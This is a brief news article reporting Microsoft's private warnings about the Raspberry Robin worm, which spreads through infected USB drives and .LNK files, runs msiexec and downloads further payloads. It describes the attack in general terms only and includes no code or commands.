Microsoft warns about high-risk worm infecting lots of Windows networks!!!

The struggle between good and evil never ends in the cybersecurity industry. We frequently learn about brand-new exploits that hostile actors are using, as well as the proactive and reactive defenses being developed to counter them. A high-risk worm that is currently contaminating hundreds of Windows enterprise networks has prompted Microsoft to issue secret advisories.

The malware, known as "Raspberry Robin," is transmitted by infected USB drives that include a.LNK file on them. When a user clicks on this file, the worm launches another malicious file by starting a msiexec.exe process in Command Prompt. Then, it uses a brief URL to interact with command and control servers. If the connection is successful, numerous programs are downloaded and installed.

Microsoft is currently privately alerting Defender for Endpoint subscribers about the risks posed by Raspberry Robin, according to Bleeping Computer. Additionally, it said that it had found the worm in hundreds of Windows networks from various industries.

The fact that affected computers are able to communicate with the Tor network, however, indicates that the threat actors behind Raspberry Robin have not yet used the exploit to access confidential data or spread ransomware. They can accomplish this with ease because the initial payloads they downloaded allow for the exploitation of Windows utilities to get around User Account Control (UAC). Because of this, it is not yet known which threat organization is using Raspberry Robin or what their final objective is. However, Microsoft has classified it as a high-risk campaign for the time being because of the threat's potential to worsen and how quickly it is spreading.